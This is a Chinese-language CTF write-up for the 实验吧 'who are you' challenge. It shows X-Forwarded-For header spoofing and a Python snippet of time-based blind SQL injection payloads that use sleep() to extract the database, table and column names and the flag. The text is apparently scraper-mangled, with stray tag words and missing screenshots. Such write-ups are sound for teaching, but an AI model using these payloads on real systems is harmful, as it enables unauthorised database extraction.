实验吧-who are you解题(时间盲注)

打开连接,展现内容以下所示:python

分析:首先想到这多是要伪造ip的题目,而后利用伪造IP的HTTP头(例如:X-Forwarded-For等)。burp中成功进行伪造,以下图所示:web

响应结果:sql

发现能够成功进行伪造,可是这些sql语句好像字符串化了,看起来并不具备判断性,接下来怎么办呢?数据库

时间型的盲注?!code

利用select case when() then end语句,根据响应时间的差别判断数据库长度,数据库表名,列名等,盲注语句以下所示:orm

# length of database
        # header = {"X-Forwarded-For":"'+(select case when(select(length(database()))>%s) then 0 else sleep(6) end) and 'a'='a" % i}
        # name of database
        # header = {"X-Forwarded-For": "'+(select case when (substring((select database()) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i,j)}
        # length of table
        # header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';') from information_schema.tables where table_schema='web4') from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}
        # name of table
        # header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';')"
        #                              " from information_schema.tables where table_schema='web4') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (
        #                              i, j)}
        # length of column
        # header = {
        #     "X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';') "
        #                        "from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='') "
        #                        "then sleep(6) else 0 end) and 'a'='a" % i}
        # name of column
        # header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';')"
        #                              " from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (
        #                                  i, j)}
        # length of flag
        # header = {
        #     "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
        #                        "from flag) from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}
        # name of flag
        header = {
            "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
                               "from flag) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}

结果以下:blog

相关文章
相关标签/搜索